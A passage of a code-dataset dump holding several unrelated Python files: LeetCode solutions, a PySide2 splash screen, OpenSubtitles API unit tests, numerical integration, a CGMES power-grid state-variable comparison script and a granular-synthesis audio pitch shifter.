range(len(matrix)):\r\n                matrix[row][0]=0\r\n        if col_flag:\r\n            for col in range(len(matrix[0])):\r\n                matrix[0][col]=0\r\n    def print_matrix(self,matrix):\r\n        for line in matrix:\r\n            print(line)\r\nso=Solution()\r\nmatrix=[[0,0,0,5],[4,3,1,4],[0,1,1,4],[1,2,1,3],[0,0,1,1]]\r\nso.print_matrix(matrix)\r\nso.setZeroes(matrix)\r\nprint()\r\nso.print_matrix(matrix)","repo_name":"darrencheng0817/AlgorithmLearning","sub_path":"Python/leetcode/SetMatrixZeroes.py","file_name":"SetMatrixZeroes.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"38393520780","text":"# A phrase is a palindrome if, after converting all uppercase letters into lowercase letters \n# and removing all non-alphanumeric characters, it reads the same forward and backward. \n# Alphanumeric characters include letters and numbers.\n# Given a string s, return true if it is a palindrome, or false otherwise.\n\n# tips:\n# use left and right pointers to check whether the characters on both ends match\n# non-alphanumeric characters can be stripped first, or simply skipped during the comparison\n\n# first try\nclass Solution(object):\n    def isPalindrome(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: bool\n        \"\"\"\n\n        p1, p2 = 0, len(s) - 1\n\n        while p1 < p2:\n            if not s[p1].isalnum():\n                p1 += 1\n                continue\n\n            if not s[p2].isalnum():\n                p2 -= 1\n                continue\n\n            if s[p1].lower() != s[p2].lower():\n                return False\n            else:\n                p1 += 1\n                p2 -= 1\n\n        return True","repo_name":"hcygeorge/my-leetcode","sub_path":"string/easy/125. 
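A quick demo of the two-pointer palindrome check above, using the usual LeetCode example strings:

s = Solution()
print(s.isPalindrome("A man, a plan, a canal: Panama"))  # True
print(s.isPalindrome("race a car"))                      # False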
Valid Palindrome.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23870157136","text":"import platform\nimport sys\nfrom PySide2.QtWidgets import QApplication,QMainWindow\nfrom PySide2 import QtCore,QtGui\nfrom ui_Splashp1 import Ui_SplashScreen\nfrom PySide2.QtCore import QTimer\nfrom PySide2.QtWidgets import *\n\ncounter =0 # THIS IS TO SET AN INITVALUE FOR THE COUNTER\n\nclass SplashScreen(QMainWindow):\n def __init__(self):\n super().__init__()\n self.ui = Ui_SplashScreen()\n self.ui.setupUi(self)\n\n # REMOVING THE TITLE BAR\n self.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n self.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n\n\n # TMER -> SET\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.progress)\n # SETTING THE TIME IN MILLISECONDS\n self.timer.start(35)\n \n\n # CHANGING THE DESCRIPTION LABEL \n QtCore.QTimer.singleShot(1500,lambda: self.ui.label_description.setText(\"Using MacosLabs Engines\"))\n QtCore.QTimer.singleShot(4000,lambda :self.ui.label_loading.setText(\"Loading...User Interface\"))\n QtCore.QTimer.singleShot(3600,lambda: self.ui.label_description.setText(\"We Build The Future\"))\n QtCore.QTimer.singleShot(5300,lambda: self.ui.label_description.setText(\"Ready?\"))\n \n\n\n # ==================================\n # SHOW -> MAIN WINDOW\n self.show()\n\n # ==================================\n\n# ===============================================\n# APPLICATION FUNCTIONS -> RECIEVERS\n def progress(self):\n global counter\n\n self.ui.progressBar.setValue(counter)\n\n # LOGIC FOR THE SPLASHSCREEN\n\n if counter > 100:\n\n self.timer.stop()\n\n\n self.close()\n\n counter +=1\n# ================================================\n\nif __name__ == '__main__':\n myapp = QApplication([])\n window = SplashScreen()\n window.show()\n sys.exit(myapp.exec_())\n\n\n","repo_name":"markowusu/SplashScreen","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28093346846","text":"import sys\n\nn = 0\nfor l in sys.stdin:\n line = l.strip()\n if not line:\n print('1')\n n = 0\n else:\n if n % 4 == 0 and n != 0:\n print('0')\n n += 1\n","repo_name":"shohata/Dump_Eater","sub_path":"tlast.py","file_name":"tlast.py","file_ext":"py","file_size_in_byte":163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26236724892","text":"from pythonopensubtitles.opensubtitles import OpenSubtitles\n\nimport base64\nimport json\nimport os\nimport tempfile\nimport unittest\nimport zlib\nimport unittest.mock as mock \n\nclass MockServerProxy:\n pass\n\nclass TestOpenSubtitles(unittest.TestCase):\n def setUp(self):\n self.mock = MockServerProxy()\n self.ost = OpenSubtitles()\n self.ost.xmlrpc = self.mock\n\n def test_login(self):\n self.mock.LogIn = lambda *_: {\n 'status': '403',\n }\n assert self.ost.login('good@mail.com', 'goodpassword') is None\n\n self.mock.LogIn = lambda *_: {\n 'status': '200 OK',\n 'token': 'token',\n }\n assert self.ost.login('good@mail.com', 'goodpassword') == 'token'\n \n def test_search_subtitles(self):\n self.mock.SearchSubtitles = lambda *_: fixture('search_subtitles')\n \n data = self.ost.search_subtitles([])\n \n assert len(data) == 1\n assert data[0].get('IDSubtitle') == '7783633'\n assert data[0].get('IDSubtitleFile') == '1956355942'\n assert 
data[0].get('IDSubMovieFile') == '19353776'\n\n def test_search_imdb(self):\n self.mock.SearchMoviesOnIMDB = lambda *_: {\n 'status': '200 OK',\n 'data': [\n {\n 'IDMovieImdb': 'id',\n }\n ]\n }\n\n # TODO: not sure if these are the right params. I am just keeping the test because it was on the README\n data = self.ost.search_movies_on_imdb([])\n assert data[0].get('IDMovieImdb') == 'id'\n\n def test_no_operation(self):\n self.mock.NoOperation = lambda *_: {'status': '200 OK'}\n assert self.ost.no_operation()\n\n def test_logout(self):\n self.mock.LogOut = lambda *_: {'status': '403'}\n assert not self.ost.logout()\n\n self.mock.LogOut = lambda *_: {'status': '200 OK'}\n assert self.ost.logout()\n\n def test_auto_update(self):\n self.mock.AutoUpdate = lambda *_: {\n 'status': '200 OK',\n 'version': 'something',\n }\n data = self.ost.auto_update('SubDownloader')\n assert 'version' in data.keys()\n\n def test_already_exists(self):\n self.mock.TryUploadSubtitles = lambda *_: {\n 'status': '403',\n }\n # TODO: The error here is unauthorized and not that the subtitle wasn't found,\n # however, for not breaking compatibility we will keep it this way for now.\n assert not self.ost.try_upload_subtitles([])\n\n self.mock.TryUploadSubtitles = lambda *_: {\n 'status': '200 OK',\n 'alreadyindb': 1,\n }\n assert self.ost.try_upload_subtitles([])\n\n def test_upload_subtitles(self):\n self.mock.UploadSubtitles = lambda *_: {\n 'status': '200 OK',\n 'data': {\n 'url': 'http://example.com',\n },\n }\n data = self.ost.upload_subtitles([])\n assert 'url' in data.keys()\n\n def test_check_subtitle_hash(self):\n self.mock.CheckSubHash = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n data = self.ost.check_subtitle_hash([])\n assert data == {}\n \n def test_check_movie_hash(self):\n self.mock.CheckMovieHash = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n data = self.ost.check_movie_hash([])\n assert data == {}\n\n def test_insert_movie_hash(self):\n self.mock.InsertMovieHash = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n data = self.ost.insert_movie_hash([])\n assert data == {}\n\n def test_report_wrong_movie_hash(self):\n self.mock.ReportWrongMovieHash = lambda *_: {\n 'status': '419',\n }\n assert not self.ost.report_wrong_movie_hash([])\n\n self.mock.ReportWrongMovieHash = lambda *_: {\n 'status': '200 OK',\n }\n assert self.ost.report_wrong_movie_hash([])\n\n def test_report_wrong_movie_hash_404(self):\n self.mock.ReportWrongMovieHash = lambda *_: {\n 'status': '404',\n }\n assert not self.ost.report_wrong_movie_hash('hash')\n\n self.mock.ReportWrongMovieHash = lambda *_: {\n 'status': '200 OK',\n }\n assert self.ost.report_wrong_movie_hash('hash')\n\n def test_get_subtitle_languages(self):\n self.mock.GetSubLanguages = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n assert self.ost.get_subtitle_languages() == {}\n\n def test_get_available_translations(self):\n self.mock.GetAvailableTranslations = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n assert self.ost.get_available_translations('SubDownloader') == {}\n\n def test_subtitles_votes(self):\n self.mock.SubtitlesVote = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n assert self.ost.subtitles_votes({}) == {}\n\n def test_get_comments(self):\n self.mock.GetComments = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n assert self.ost.get_comments([]) == {}\n\n def test_add_comment(self):\n self.mock.AddComment = lambda *_: {\n 'status': '403',\n }\n assert not self.ost.add_comment({})\n\n 
self.mock.AddComment = lambda *_: {\n 'status': '200 OK',\n }\n assert self.ost.add_comment({})\n\n def test_add_request(self):\n self.mock.AddRequest = lambda *_: {\n 'status': '200 OK',\n 'data': {},\n }\n assert self.ost.add_request({}) == {}\n\n def test_download_subtitles(self):\n self.mock.DownloadSubtitles = lambda *_: fixture('download_subtitles')\n with tempfile.TemporaryDirectory() as tmpdirname:\n data = self.ost.download_subtitles(['id'], output_directory=tmpdirname)\n \n assert data, data\n \n @mock.patch('pythonopensubtitles.opensubtitles.decompress', return_value='test_decoded_data')\n def test_download_subtitles_force_encoding(self, mock_decompress):\n self.mock.DownloadSubtitles = lambda *_: fixture('download_subtitles')\n with tempfile.TemporaryDirectory() as tmpdirname:\n data = self.ost.download_subtitles(['id'], output_directory=tmpdirname, encoding='test_encoding')\n encoded_data=self.ost._get_from_data_or_none('data')\n mock_decompress.assert_called_with(encoded_data[0]['data'], encoding='test_encoding')\n assert data, data\n\ndef fixture(name):\n fullpath = os.path.join(os.path.dirname(__file__), 'fixtures', name+'.json')\n with open(fullpath) as f:\n return json.load(f)","repo_name":"agonzalezro/python-opensubtitles","sub_path":"pythonopensubtitles/test_opensubtitles.py","file_name":"test_opensubtitles.py","file_ext":"py","file_size_in_byte":6768,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"37"} +{"seq_id":"70968028589","text":"import math\r\n\r\ndef f(x) :\r\n return math.exp(-(1/(x*x)))/(x*x)\r\n\r\ndef Simpson(a, b, h) :\r\n sum = f(a) + f(b)\r\n i = 1\r\n x = a + h\r\n while x < b - h :\r\n if i%2 != 0 :\r\n sum += 4*f(x)\r\n else :\r\n sum += 2*f(x)\r\n x += h\r\n i += 1\r\n return h*sum/3.\r\n\r\ndef rectangles(a, b, h) :\r\n sum = 0\r\n x = a + h * 0.5\r\n while x < b :\r\n sum += f(x)\r\n x += h\r\n sum *= h\r\n return sum\r\n\r\n\r\n\r\n\r\nA = (4*0.0001)**(1/4)\r\nprint(\"A = \", A)\r\n\r\na = A\r\nb = 1.5\r\nh = 0.00005\r\nsimp = Simpson(a, b , h)\r\nh /= 2\r\ndivsimp = Simpson(a, b, h)\r\nerr_val = math.fabs(simp - divsimp)/12.\r\nwhile err_val > 0.0001 :\r\n simp = Simpson(a, b , h)\r\n h /= 2\r\n divsimp = Simpson(a, b, h)\r\n err_val = math.fabs(simp - divsimp)/12\r\nprint(\"I (w eps =< 0.0001) = \", Simpson(a, b, h), \" Error: \", err_val)\r\nrect = rectangles(a, b, h)\r\nh /= 2\r\ndivrect = rectangles(a, b ,h)\r\nerr_val = math.fabs(rect - divrect)/4.\r\nwhile err_val > 0.0001 :\r\n rect = rectangles(a, b, h)\r\n h /= 2\r\n divrect = rectangles(a, b ,h)\r\n err_val = math.fabs(rect - divrect)/4.\r\nprint(\"I (w eps =< 0.0001) = \", rectangles(a, b, h), \" Error: \", err_val)\r\ninput()\r\n","repo_name":"Chapelin14/lab5-1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19103132816","text":"import sys\nsys.path.append(\"..\")\n\nfrom RDF_parser import load_all_to_dataframe\n\nfrom itertools import permutations\n\nimport pandas\n#from urlparse import urlparse\n\nfrom pyvis.network import Network\nimport pyvis.options as options\nimport os\n\nimport tempfile\n\n\nfrom CGMES_tools import *\n\n\n\n\npandas.set_option(\"display.max_rows\", 15)\npandas.set_option(\"display.max_columns\", 6)\npandas.set_option(\"display.width\", 1000)\n\n\n##paths = [r\"C:\\Users\\kristjan.vilgo\\Downloads\\results_CVG\\20190116T0930Z_1D_CGMEU_SV_000.zip\",\n## 
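For reference, the halving loops in the numerical-integration script from Chapelin14/lab5-1 above implement Richardson/Runge error estimation; for a rule of order p the textbook form is

\[ \operatorname{err}(h/2) \approx \frac{\lvert I_{h/2} - I_h \rvert}{2^{p} - 1}, \]

i.e. divisor 15 for Simpson's rule (p = 4) and 3 for the midpoint rule (p = 2), so the `/12.` and `/4.` used in that script appear to be near-miss variants of those constants.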
r\"C:\\Users\\kristjan.vilgo\\Downloads\\20190116_0930Z_ELES_HOPS_NOSBIH_TNA\\20190116T0930Z_1D_CGMCE_SCC_SV_000\\20190116T0930Z_1D_CGMCE_SCC_SV_000.xml\",\n## r\"C:\\Users\\kristjan.vilgo\\Downloads\\20190116T0930Z_1D_AMICA_merged_model_RGCE_Prague_meeting\\20190116T0930Z_1D_CGMCE_SV_002.zip\",\n## r\"C:\\Users\\kristjan.vilgo\\Downloads\\2019016_0930Z_ELES_HOPS_NOSBIH_PowerFactory\\3TSOsMerge\\20190116T0930Z_1D_Abildgaard_SV_001\\20190116T0930Z_1D_Abildgaard_SV_001.xml\",\n## r\"C:\\Users\\kristjan.vilgo\\Downloads\\export\\20190325T1722Z_1D_CGMBA_SV_001\\20190325T1722Z_1D_CGMBA_SV_001.xml\",\n## r\"C:\\Users\\kristjan.vilgo\\Downloads\\IGM_data.zip\",\n## r\"C:\\Users\\kristjan.vilgo\\Downloads\\20190304T0000Z_ENTSO-E_BD_001.zip\"]\n\n\n##paths = [r\"C:\\IOPs\\IOP100419\\RSC_MERGE\\20190410_0930_Convergence_results_ELES_HOPS_NOSBIH\\20190410T0930Z_1D_CGMEU_SV_001.zip\",\n## r\"C:\\IOPs\\IOP100419\\RSC_MERGE\\20190410_0930Z_PowerFactory_ELES_HOPS_NOSBIH\\EMF2019-04-10_0930Z_ELESHOPSNOSBIH\\19700101T0000Z_1D_PowerFactory_SV_001.zip\",\n## r\"C:\\IOPs\\IOP100419\\RSC_MERGE\\20190410_0930Z_SCC1_results_ELES_HOPS_NOSBIH\\2\\20190410T0930Z_1D_CGMCE_SCC_SV_001.zip\",\n## r\"C:\\IOPs\\IOP100419\\RSC_MERGE\\20190410T0930Z_1D_BALTICRSC_CGMCE_001\\20190410T0930Z_1D_BALTICRSC_CGMCE_001\\20190410T0930Z_1D_CGMBA_SV_001.zip\",\n## r\"C:\\IOPs\\IOP100419\\RSC_MERGE\\20190410T0930Z_1D_small_merge_AMICA\\20190410T0930Z_1D_CGMCE_SV_002.zip\",\n## r\"C:\\IOPs\\IOP100419\\RSC_MERGE\\20190410T0930Z_NRSC_Merge_ELES_HOPS_NOSBIH\\20190410T0930Z_1D_CGMNO_SV_001.zip\",\n## r\"C:\\Users\\kristjan.vilgo\\Downloads\\20190304T0000Z_ENTSO-E_BD_001.zip\",\n## r\"C:\\IOPs\\IOP100419\\RSC_MERGE\\IGM_TP_EQ.zip\"\n##]\n\n\n# Define here paths that you want to load. Load only SV files you want to compare, usually CGM SV files\npaths = [r\"C:\\IOPs\\IOP150519\\RSC_MERGE\\20190515T0930Z_1D_BALTICRSC-CE_002.zip\",\n r\"C:\\IOPs\\IOP150519\\RSC_MERGE\\20190515T0930Z_1D_CORESO-CE_002.zip\",\n r\"C:\\IOPs\\IOP150519\\RSC_MERGE\\20190515T0930Z_1D_HANS-CE_004.zip\",\n r\"C:\\IOPs\\IOP150519\\RSC_MERGE\\20190515T0930Z_1D_TSCNET-CE_003_distributed_slack.zip\",\n r\"C:\\Users\\kristjan.vilgo\\Downloads\\20190304T0000Z_ENTSO-E_BD_001.zip\",\n r\"C:\\IOPs\\IOP150519\\RSC_MERGE\\IGM.zip\"\n ]\n\n\ndata = load_all_to_dataframe(paths)\n\n\n\nloaded_profiles = data.type_tableview(\"FullModel\")[[u'Model.created', u'Model.description', u'Model.modelingAuthoritySet', u'Model.profile', u'Model.scenarioTime', u'Model.version']] #\nprint(loaded_profiles)\n\ncomparison_dict = {\"statistics\":{}, \"data\":{}, \"report\":{\"Instances\": loaded_profiles}}\nSV_UUID_list = data.query(\"VALUE == 'http://entsoe.eu/CIM/StateVariables/4/1'\").ID.tolist()\n\nEMF_namelist = []\n\nfor SV_UUID in SV_UUID_list:\n\n instance_data = data.query(\"INSTANCE_ID == '{}'\".format(SV_UUID))\n authority = instance_data.query(\"KEY == 'Model.modelingAuthoritySet'\").VALUE.item()\n\n try:\n EMF_name = urlparse(authority).netloc\n\n except:\n print(\"No modelling authorityset found or invalid url -> {}, using SV UUID\".format(authority))\n EMF_name = SV_UUID\n\n\n comparison_dict[\"statistics\"][\"{}\".format(EMF_name)] = instance_data.types_dict()\n comparison_dict[\"data\"][\"{}\".format(EMF_name)] = instance_data\n\n EMF_namelist.append(EMF_name)\n\n\nstatistics = pandas.DataFrame(comparison_dict[\"statistics\"])\ncomparison_dict[\"report\"][\"SvStatistics\"] = statistics\nprint(statistics)\n\n\n# Add here parameters to compere and at what index\nsettings = [dict(index 
= \"SvTapStep.TapChanger\", merge_column = \"SvTapStep.position\"),\n dict(index = \"SvPowerFlow.Terminal\", merge_column = \"SvPowerFlow.p\"),\n dict(index = \"SvPowerFlow.Terminal\", merge_column = \"SvPowerFlow.q\"),\n dict(index = \"SvVoltage.TopologicalNode\", merge_column = \"SvVoltage.v\"),\n dict(index = \"SvVoltage.TopologicalNode\", merge_column = \"SvVoltage.angle\")]\n\n#data.query(\"VALUE == 'ControlArea'\")\n\n# Create all comparison tables\nfor setting in settings:\n\n column_name = setting[\"merge_column\"]\n type_name = setting[\"merge_column\"].split(\".\")[0]\n\n comparison_dict[column_name] = {}\n comparison_data = pandas.DataFrame()\n\n for SV_UUID in comparison_dict[\"data\"].keys():\n\n rename_dict = {column_name:SV_UUID}\n\n data_view = comparison_dict[\"data\"][SV_UUID].\\\n type_tableview(type_name).\\\n set_index(setting[\"index\"])\\\n [[column_name]].\\\n rename(rename_dict, axis = \"columns\").\\\n apply(pandas.to_numeric, errors = \"ignore\")#, drop = False) # use .reset_index() before .set_index() to keep result UUID\n\n comparison_data = comparison_data.join(data_view, how = \"outer\")\n\n # Report all SV combinations\n combinations = permutations(comparison_dict[\"data\"].keys(), 2)\n\n for combination in combinations:\n\n diff_column_name = \"<{}> - <{}>\".format(combination[0], combination[1])\n comparison_data[diff_column_name] = comparison_data[combination[0]] - comparison_data[combination[1]]\n\n comparison_dict[\"report\"][column_name] = comparison_data\n\n # Add statistics\n\n #columns = [u' - ', u' - ', u' - ', u' - ']\n\n comparison_dict[\"report\"][column_name + \"_\" + \"statistics\"] = comparison_dict[\"report\"][column_name][EMF_namelist].describe()\n\n##excel_writer = pandas.ExcelWriter(r\"C:\\IOPs\\IOP150519\\RSC_MERGE\\SV_comparison_150519.xlsx\")\n##\n##for report in comparison_dict[\"report\"].keys():\n## comparison_dict[\"report\"][report].to_excel(excel_writer, sheet_name = report)\n##\n##excel_writer.save()\n\n\nprint(loaded_profiles[loaded_profiles[\"Model.profile\"]==\"http://entsoe.eu/CIM/StateVariables/4/1\"])\n\nprint(\"all data is avaialbel in 'comparison_dict'\")\nprint(comparison_dict.keys())\n\n##relations_from('000319d5-61de-4ed8-a5a3-9058d85012d1')\n\n# Generate classical data views needed to extract relevant data\n\nACLineSegments = data.type_tableview(\"ACLineSegment\")\nTerminals = data.type_tableview(\"Terminal\")\n\nPowerTransformerEnds = data.type_tableview(\"PowerTransformerEnd\")\nSynchronousMachines = data.type_tableview(\"SynchronousMachine\")\n\n#PowerTransformers = data.type_tableview(\"PowerTransformer\")\n\nSynchronousMachines = pandas.merge(SynchronousMachines.reset_index(), Terminals.reset_index(), suffixes=('', '_Terminal'), how = \"inner\", left_on = \"ID\", right_on = 'Terminal.ConductingEquipment')\n\n# Query for referenced object\nGeneratingUnits = tableview_by_IDs(data, SynchronousMachines,\"RotatingMachine.GeneratingUnit\")\nRegulatingControls = tableview_by_IDs(data, SynchronousMachines,\"RegulatingCondEq.RegulatingControl\")\n\n# Add data from referenced objects\nSynchronousMachines = pandas.merge(SynchronousMachines, GeneratingUnits, left_on = \"RotatingMachine.GeneratingUnit\", right_index = True, how= \"inner\", suffixes=('', '_GeneratingUnit'))\n\n\n\n\nsv_profiles = loaded_profiles[loaded_profiles[\"Model.profile\"]==\"http://entsoe.eu/CIM/StateVariables/4/1\"]\n\nfor UUID, row in sv_profiles.iterrows():\n\n authority = row['Model.modelingAuthoritySet']\n\n try:\n EMF_name = 
urlparse(authority).netloc\n\n except:\n print(\"No modelling authorityset found or invalid url -> {}, using SV UUID\".format(authority))\n EMF_name = SV_UUID\n\n SvVoltages = data.query(\"INSTANCE_ID == '{}'\".format(UUID)).type_tableview(\"SvVoltage\").add_prefix(EMF_name + \"_\")\n SvPowerFlows = data.query(\"INSTANCE_ID == '{}'\".format(UUID)).type_tableview(\"SvPowerFlow\").add_prefix(EMF_name + \"_\")\n\n SynchronousMachines = pandas.merge(SynchronousMachines, SvVoltages, suffixes=('', '_SvVoltage'), how = \"inner\", left_on = 'Terminal.TopologicalNode', right_on = EMF_name + '_SvVoltage.TopologicalNode')\n SynchronousMachines = pandas.merge(SynchronousMachines, SvPowerFlows, suffixes=('', '_SvPowerFlow'), how = \"inner\", left_on = 'ID_Terminal', right_on = EMF_name + '_SvPowerFlow.Terminal')\n\n\n\n\n\n","repo_name":"Haigutus/USVDM","sub_path":"Tools/RDF_PARSER/examples/compare_SV.py","file_name":"compare_SV.py","file_ext":"py","file_size_in_byte":8636,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"19121575459","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 23 15:24:40 2021\n\nGRANULAR SYNTHESIS in python\n\n@purpose\nThe focus is on real-time pitch shifting implementation using python\nReal time implying low-latency and with a live signal as opposed to recorded\nThe algorithm will be converted to C++ to port/send to an microcontroller board\nThe board is to be used bare metal (no operating system or anything)\nAt the moment the teensy is going to be used to interface the MIDI with the code\n\n\"\"\"\n\nimport struct\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.io import wavfile\nimport wave\nimport sys\n\n###############################################\n# steps\n###############################################\n#1)resample original signal\n# * figure out length of singal\n# *figure out number of samples\n# *OR samples per time frame\n#2)buffer\n#3)window (tapered) /corssfade apply\n##################################################\n\n #Functions\n \n#This function is simple fractional resampling as a linear interpolation between the current and next sample\ndef get_subsample(x, t):\n n = int(t)\n a = 1.0 - (t - n)\n try:\n return a * x[n] + (1 - a) * x[n + 1] \n except IndexError:\n try:\n return a * x[n]\n except IndexError:\n return 0\n \n#This is running through the original signal and sampling it at a desired rate realtive to the wanted pitch \ndef resample(x, factor):\n # length of the output signal after resampling\n n_out = int(np.floor(len(x) / factor))\n y = np.zeros(n_out)\n for n in range(0, n_out):\n y[n] = get_subsample(x, float(n) * factor)\n return y\n\n#This is converting miliseconds into a number of samples, which is merely a formula\ndef milliseconds2samples(ms, sampleRate):\n ms2Samp = int(float(sampleRate) * float(ms) / 1000.0)\n return ms2Samp\n \n\n#This is the tapering window to be used for the grains for smooth overlap\ndef win_taper(N, overlap):\n R = int(N * overlap / 2)\n r = np.arange(0, R) / float(R)\n win = np.r_[r, np.ones(N - 2*R), r[::-1]]\n stride = N - R - 1\n return win, stride\n\n#This is the overlap between grainsusing a tapering envelope/window\ndef GS_pshift(x, factor, grain_size, overlap=0.5):\n N = len(x)\n y = np.zeros(N)\n # size of input buffer given target ouptut grain size and resampling factor\n input_chunk_size = int(grain_size * factor + 0.5)\n win, stride = win_taper(grain_size, overlap)\n for n in range(0, len(x) - 
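Two notes on compare_SV.py above: its `from urlparse import urlparse` import is commented out, so the urlparse() calls would raise NameError were they not wrapped in bare except clauses that silently fall back to the SV UUID (on Python 3 the function lives in urllib.parse); and the pairwise SV comparison builds one diff column per ordered pair of result sets. A toy of that permutations pattern, with made-up column names:

import pandas as pd
from itertools import permutations

df = pd.DataFrame({"rscA": [1.0, 2.0], "rscB": [1.1, 1.9]})
cols = list(df.columns)  # snapshot before adding the diff columns
for a, b in permutations(cols, 2):
    df["<{}> - <{}>".format(a, b)] = df[a] - df[b]
print(df)  # two data columns plus '<rscA> - <rscB>' and '<rscB> - <rscA>'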
max(input_chunk_size, grain_size), stride):\n w = resample(x[n:n+input_chunk_size], factor)\n y[n:n+grain_size] += w * win\n return y\n\n#This creates a cosine signal at a fixed frequency\ndef signalGen(freq, Fs, dur):\n wav = np.zeros(Fs*dur)\n t = np.linspace(0, dur, Fs*dur)\n for i in range(t.size):\n wav[i] = np.cos(2*np.pi*freq*t[i])\n return wav\n\n #Main Code\n #TODO: MODIFY THE SETUP CODE ACCORDING TO COMMENTS BELOW.\n \n#IF YOU WANT TO USE A GENERATED SIGNAL, UNCOMMENT THE TWO LINES BELOW\nfreq = 200 #TODO: SET FREQUENCY OF SIGNAL GENERATOR\nsampleRate= 48000\ndataArray = signalGen(freq,sampleRate,2) #TODO: IF YOU WANT TO TEST A SINUSOID, USE THIS. ARG 1 IS NOTE FREQUENCY, ARG 2 IS SAMPLE FREQUENCY (44.1kHz), ARG 3 IS SIGNAL LENGTH IN SECONDS\nplotType =0 #TODO: THIS IS A FLAG TO DO THE CORRESPONDING TYPE OF PLOTTING\n \n#IF YOU WANT TO USE AN INPUT WAV FILE, UNCOMMENT THE FOLLOWING LINES\n#wavFileName =\"\"\n#sampleRate, dataArray = wavfile.read(wavFileName) #TODO: OTHERWISE, SUBSTITUTE THE FILENAME WITH SOME OTHER FILE\n#plotType =1 #TODO: THIS IS A FLAG TO DO THE CORRESPONDING TYPE OF PLOTTING\n \n#Convert stereo signals to mono\nif dataArray.shape[0] == 2:\n dataArray = (dataArray[...,0] + dataArray[...,1])/2\n\n\n# You can change these values to see the different effects.\ngrainInms = 120\npitch = 1.7 # 1=original pitch, <1 = lower in pitch, >1 = higher in pitch\noverlapGrainWindow =.5 #25%\n\n#convert to float and put between range of [-1, 1], max of range of int (-32768 to 32767)\nrange1Neg1 = dataArray /32767.0\n\ngrain_size = milliseconds2samples(grainInms, sampleRate)\n\npitchShiftedDataArray = GS_pshift(range1Neg1, pitch, milliseconds2samples(grainInms, sampleRate), overlapGrainWindow)\n\npitchShiftedDataArray = (pitchShiftedDataArray *2**15)\n\nwavfile.write(\"PitchShiftedOutput.wav\", sampleRate, pitchShiftedDataArray.astype(np.int16))\n #End Of Main Code\n\n\n #Visualing and Analyzing the audio signals\n\n#######################signwave plotting\nif plotType==0 :\n #Input Signal\n plt.plot( dataArray[0:])\n plt.xlim(0,10000)\n # display the plot\n plt.show()\n\n #Output Signal\n wavFileName =\"PitchShiftedOutput.wav\"\n sampleRate, dataArray = wavfile.read(wavFileName)\n plt.plot( dataArray[0:])\n plt.xlim(0,10000)\n # display the plot\n plt.show()\n \nelse:\n spf = wave.open(\"//engin-labs.m.storage.umich.edu/allanahm/windat.v2/Documents/OSR_us_000_0010_8k.wav\", \"r\")\n \n # Extract Raw Audio from Wav File\n signal = spf.readframes(-1)\n signal = np.frombuffer(signal, dtype='int16')\n fs = spf.getframerate()\n \n # If Stereo\n if spf.getnchannels() == 2:\n print(\"Just mono files\")\n sys.exit(0)\n \n \n Time = np.linspace(0, len(signal) / fs, num=len(signal))\n \n \n # read audio samples\n input_data = wavfile.read(wavFileName)\n audio = input_data[1]\n \n \n # plot the first 1024 samples of original signal\n plt.plot(audio[0:])\n # label the axes\n plt.ylabel(\"Amplitude\")\n plt.xlabel(\"Time\")\n # set the title \n plt.title(\"Audio Signal of Wav File\") \n # display the plot\n plt.show()\n \n \n wav_file = wave.open(wavFileName)\n totalFrames=wav_file.getframerate()\n data = wav_file.readframes(totalFrames)\n wav_file.close()\n data = struct.unpack('{n}h'.format(n=totalFrames), data)\n data = np.array(data)\n data_fft = np.fft.fft(data)\n # This will give us the frequency we want\n \n frequencies = np.abs(data_fft)\n print(\"The frequency is {} Hz\".format(np.argmax(frequencies)))\n \n \n #Original Signal Analysis and Plots\n plt.plot(data[:])\n 
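A worked micro-example of the fractional resampling at the top of Granular_Synthesis.py: reading the signal at t = 1.25 linearly interpolates between x[1] and x[2]:

x = [0.0, 1.0, 3.0]
print(get_subsample(x, 1.25))  # 0.75*1.0 + 0.25*3.0 = 1.5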
plt.title(\"Original Audio Wave\")\n plt.ylabel(\"Amplitude\")\n plt.show()\n \n plt.plot(frequencies)\n plt.title(\"Frequencies found\")\n plt.xlim(0,3000)\n plt.ylabel(\"Quantity\")\n plt.xlabel(\"Frequency\")\n plt.show()\n \n \n #Output File Analysis and Plots (same methods as above)\n wav_file = wave.open(\"PitchShiftedOutput.wav\", 'r')\n totalFrames=wav_file.getframerate()\n data = wav_file.readframes(totalFrames)\n wav_file.close()\n data = struct.unpack('{n}h'.format(n=totalFrames), data)\n data = np.array(data)\n data_fft = np.fft.fft(data)\n # This will give us the frequency we want\n \n frequencies = np.abs(data_fft)\n print(\"The frequency is {} Hz\".format(np.argmax(frequencies)))\n \n plt.plot(data[:])\n plt.title(\"Output Audio Wave\")\n plt.ylabel(\"Amplitude\")\n plt.show()\n \n plt.plot(frequencies)\n plt.title(\"Output Frequencies Found\")\n plt.ylabel(\"Quantity\")\n plt.xlabel(\"Frequency\")\n plt.xlim(0,3000)\n 